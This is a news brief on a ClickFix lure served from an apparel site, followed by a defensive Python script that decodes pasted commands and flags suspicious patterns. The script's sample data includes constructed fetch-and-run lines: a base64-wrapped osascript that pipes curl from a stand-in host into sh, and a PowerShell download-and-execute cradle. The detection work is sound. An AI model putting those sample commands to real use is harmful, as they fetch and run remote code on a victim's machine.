HeadlinesBriefing.com

FBI Director's Apparel Site Linked to ClickFix Malware Attack

Source: Hacker News

BasedApparel.com, the apparel brand co-founded by FBI director Kash Patel, has been serving macOS visitors a ClickFix lure. The site displays a fake Cloudflare CAPTCHA verification page that instructs visitors to copy a command and paste it into Terminal; once run, the command downloads a Trojan infostealer that harvests browser credentials and crypto wallet data. A user in Portugal discovered the scheme after reaching the site through an Atlantic article that linked to Patel's brand. The pasted command is obfuscated with base64 encoding so that the victim cannot read what it does, and VirusTotal flags the downloaded payload as malicious on 27 antivirus engines.
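The mechanics described above, as an added example that is not code from the article or from the BasedApparel incident: a small triage routine that takes whatever a page asked the user to paste, peels the base64 layers such commands hide behind, and flags the indicators no CAPTCHA step has any reason to contain. It generalises beyond the macOS case in the text to the Windows form of the same lure (PowerShell with an encoded command). The regex heuristics, the indicator names and the sample commands are this example's own; the samples are constructed and are not the real BasedApparel payload, which the article does not reproduce.

```python
"""Heuristic triage of a command a web page asked the user to paste.

Added example, not the article's or the site's code. Decodes nested base64
layers (UTF-8 for shell one-liners, UTF-16LE for PowerShell -EncodedCommand)
and reports ClickFix indicators found at any layer. Heuristics are illustrative.
"""
import base64
import binascii
import re

# Indicator regexes (this example's own, not a published signature set).
INDICATORS = {
    "remote_fetch":  re.compile(r"\b(?:curl|wget)\b.*?https?://", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b", re.I),
    "base64_decode": re.compile(r"\bbase64\b\s+(?:-d|-D|--decode)\b"),
    "osascript":     re.compile(r"\bosascript\b", re.I),
    "ps_encoded":    re.compile(r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "ps_cradle":     re.compile(r"\b(?:iex|invoke-expression|downloadstring)\b", re.I),
}
# Any one of these alone is enough to call the paste suspicious.
STRONG = {"pipe_to_shell", "osascript", "ps_encoded", "ps_cradle"}
# Candidate base64 blobs: 20+ base64 characters plus optional padding.
BLOB = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_blob(blob):
    """Return the blob's decoded text if it decodes to printable text, else None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    # PowerShell -EncodedCommand carries UTF-16LE: every odd byte of ASCII text is 0.
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        text = raw.decode("utf-16-le", errors="replace")
    else:
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            return None
    if not text or any(ch not in "\t\n\r" and (ord(ch) < 32 or ord(ch) == 127) for ch in text):
        return None  # binary junk, not a hidden command
    return text


def analyze_paste(text, max_depth=4):
    """Scan the pasted text and every decoded layer beneath it for indicators."""
    layers, indicators = [], set()
    queue = [(text, 0)]
    while queue:
        layer, depth = queue.pop(0)
        layers.append(layer)
        for name, rx in INDICATORS.items():
            if rx.search(layer):
                indicators.add(name)
        if depth < max_depth:
            for m in BLOB.finditer(layer):
                decoded = decode_blob(m.group(0))
                if decoded is not None:
                    queue.append((decoded, depth + 1))
    suspicious = bool(indicators & STRONG) or {"base64_decode", "remote_fetch"} <= indicators
    return {"layers": layers, "indicators": sorted(indicators), "suspicious": suspicious}


# Constructed samples for the demo (hostnames under the reserved .invalid TLD).
_INNER = "osascript -e 'do shell script \"curl -fsSL http://example.invalid/stage2 | sh\"'"
SAMPLE_LURE = f"echo {base64.b64encode(_INNER.encode()).decode()} | base64 -d | bash"
SAMPLE_PS = "powershell -w hidden -enc " + base64.b64encode(
    "iwr http://example.invalid/x | iex".encode("utf-16-le")).decode()
SAMPLE_BENIGN = "curl -fsSL https://example.invalid/tool.tar.gz -o tool.tar.gz"

if __name__ == "__main__":
    for sample in (SAMPLE_LURE, SAMPLE_PS, SAMPLE_BENIGN):
        result = analyze_paste(sample)
        print(result["suspicious"], result["indicators"])
        for i, layer in enumerate(result["layers"]):
            print(f"  layer {i}: {layer[:80]}")
```

The decision rule is deliberately asymmetric: a bare `curl ... -o file` is how people install tools every day and is only reported as an indicator, whereas a pipe into a shell, an `osascript` call or an encoded PowerShell command at any decoded layer is enough on its own, because a verification page never needs any of them.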

The attack reflects a broader trend of attackers compromising legitimate domains to deliver malware. BasedApparel.com, which Patel co-founded with Andrew Ollis before his FBI role, appears to have been compromised rather than to be serving the lure at his direction. Security researchers note that ClickFix campaigns typically get onto legitimate sites by taking over the site's admin panel with stolen credentials or by exploiting a vulnerable plugin, then injecting the fake verification page. Apple's macOS Tahoe 26.4 now warns users when they paste commands into Terminal, a mitigation aimed squarely at this lure; it still depends on the user reading the warning rather than clicking through it. The scheme relies on social engineering, preying on users' trust in CAPTCHA checks, and on the gap in user awareness that no legitimate verification step ever requires running a command. Debbie, who flagged the attack, described the script as 'interesting' due to its AppleScript use, though its malicious intent was clear once decoded.

This incident underscores the risk that a trusted brand's domain can be turned into a malware delivery point without the brand's knowledge. While Patel's involvement remains unconfirmed, the attack ran on his brand's infrastructure. The practical rule for users is simple: no CAPTCHA or 'verify you are human' step ever requires pasting a command into Terminal or any other shell, so a page that asks for it is a lure. The payload's combination of base64 encoding with AppleScript is light obfuscation rather than real technical sophistication, but it is enough to hide the command's intent from the person pasting it. As ClickFix schemes remain prevalent, this case reinforces the need for vigilance against phishing and social engineering. Tools like VirusTotal help identify a downloaded payload, but only if the user stops to check before running it; with ClickFix the pasted one-liner fetches and executes the payload in a single step, so the defense has to happen before the paste.